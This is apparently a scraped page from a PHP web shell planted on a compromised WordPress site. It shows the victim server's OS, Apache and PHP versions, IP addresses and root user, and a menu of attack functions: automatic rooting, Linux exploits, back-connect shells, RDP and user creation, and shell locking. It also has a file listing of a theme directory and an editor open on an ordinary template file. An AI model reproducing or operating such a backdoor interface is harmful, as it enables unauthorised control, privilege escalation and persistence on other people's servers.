Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
micron /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
optionpanel
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
tinymce
[ DIR ]
drwxr-xr-x
vc_templates
[ DIR ]
drwxr-xr-x
404.php
1.04
KB
-rw-r--r--
archive-faq.php
151
B
-rw-r--r--
archive-portfolio.php
177
B
-rw-r--r--
archive.php
718
B
-rw-r--r--
author.php
718
B
-rw-r--r--
category.php
718
B
-rw-r--r--
comments.php
4.91
KB
-rw-r--r--
date.php
718
B
-rw-r--r--
error_log
203.97
KB
-rw-r--r--
footer.php
1.94
KB
-rw-r--r--
functions.php
66.42
KB
-rw-r--r--
header.php
6.71
KB
-rw-r--r--
image.php
151
B
-rw-r--r--
index.php
158
B
-rw-r--r--
page-blank.php
3.78
KB
-rw-r--r--
page-certificado.php
3.45
KB
-rw-r--r--
page-sitemap.php
1.4
KB
-rw-r--r--
page-subircertificado.php
3.4
KB
-rw-r--r--
page.php
1.95
KB
-rw-r--r--
screenshot.png
118.42
KB
-rw-r--r--
search.php
1.98
KB
-rw-r--r--
searchform.php
356
B
-rw-r--r--
sidebar-faq.php
167
B
-rw-r--r--
sidebar-footer.php
395
B
-rw-r--r--
sidebar-page.php
161
B
-rw-r--r--
sidebar-portfolio.php
179
B
-rw-r--r--
sidebar-shop.php
161
B
-rw-r--r--
sidebar.php
173
B
-rw-r--r--
single-faq.php
165
B
-rw-r--r--
single-ninzio-slider.php
9.1
KB
-rw-r--r--
single-portfolio.php
177
B
-rw-r--r--
single.php
157
B
-rw-r--r--
style.css
230.08
KB
-rw-r--r--
tag.php
153
B
-rw-r--r--
taxonomy.php
718
B
-rw-r--r--
woocommerce.php
9.47
KB
-rw-r--r--
wpml-config.xml
12.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-blank.php
<?php // Template name: Blank ?> <?php global $nz_ninzio; $skin_class = ($nz_ninzio['ninzio-skin'] && $nz_ninzio['ninzio-skin'] == "dark") ? "dark-skin" : "light-skin"; $values = get_post_custom( get_the_ID() ); $nz_ninzio_page_layout_class = ""; if(isset($values["ninzio_page_layout"][0]) && $values["ninzio_page_layout"][0] == "yes"){ $nz_ninzio_page_layout_class = "page-full-width"; } else { $nz_ninzio_page_layout_class = "page-standard-width"; } $nz_ninzio_page_padding_top = (isset($values["ninzio_page_padding_top"][0]) && $values["ninzio_page_padding_top"][0] == "no") ? "padding-top:0px;" : "padding-top:70px;"; ?> <!doctype html> <!--[if lt IE 7]> <html class="<?php echo $skin_class; ?> no-js ie6 oldie" <?php language_attributes(); ?>> <![endif]--> <!--[if IE 7]> <html class="<?php echo $skin_class; ?> no-js ie7 oldie" <?php language_attributes(); ?>> <![endif]--> <!--[if IE 8]> <html class="<?php echo $skin_class; ?> no-js ie8 oldie" <?php language_attributes(); ?>> <![endif]--> <!--[if gt IE 8]><!--> <html class="<?php echo $skin_class; ?> no-js" <?php language_attributes(); ?>> <!--<![endif]--> <head> <!-- META TAGS --> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- LINK TAGS --> <link rel="stylesheet" href="<?php echo get_stylesheet_uri(); ?>" type="text/css" media="screen" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <?php if ( is_singular() && get_option( 'thread_comments' ) ) wp_enqueue_script( 'comment-reply' ); ?> <?php if(isset($nz_ninzio['ninzio-favicon']['url'])): ?> <link rel="shortcut icon" href="<?php echo $nz_ninzio['ninzio-favicon']['url']; ?>" type="image/x-icon" /> <?php endif; ?> <?php include("includes/dynamic-styles.php");?> <?php if($nz_ninzio['ninzio-custom-css'] && !empty($nz_ninzio['ninzio-custom-css'])){echo ("<style>".$nz_ninzio['ninzio-custom-css']."</style>");} ?> <?php if($nz_ninzio['ninzio-font-custom-css'] && !empty($nz_ninzio['ninzio-font-custom-css'])){echo ("<style>".$nz_ninzio['ninzio-font-custom-css']."</style>");} ?> <title><?php wp_title( '|', true, 'right' ); ?></title> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <!-- wrap start --> <div id="wrap" class="<?php if($nz_ninzio['ninzio-layout']){echo $nz_ninzio['ninzio-layout'];} ?>"> <div class="page-content-container"> <div class='container blank-page <?php echo $nz_ninzio_page_layout_class; ?>'> <section class='content ninzio-clearfix' style="<?php echo $nz_ninzio_page_padding_top; ?>"> <?php while ( have_posts() ) : the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <section class="page-content ninzio-clearfix"> <?php the_content(); ?> </section> </article> <?php endwhile; ?> </section> </div> <?php if(isset($values["ninzio_page_twitter"][0]) && $values["ninzio_page_twitter"][0] == "yes"): ?> <?php custom_tweets(); ?> <?php endif; ?> </div> </div> <div id="toTop"> </div> <!-- =============================== OLD BROWSER MESSAGE =============================== --> <div class="old-browser alert warning"> <div class="alert-message"> <h2><?php echo __("Your browser is out of date. It has security vulnerabilities and may not display all features on this site and other sites.", TEMPNAME) ?></h2> <p><?php echo __("Please update your browser using one of modern browsers (Google Chrome, Opera, Firefox, IE 10).", TEMPNAME) ?></p> </div> <span class="close-alert">X</span> </div> <?php wp_footer(); ?> <?php include("includes/dynamic-scripts.php"); ?> <?php if ($nz_ninzio['ninzio-google-analytics']) { echo '<script>'.$nz_ninzio['ninzio-google-analytics'].'</script>'; } ?> </body> </html>
Close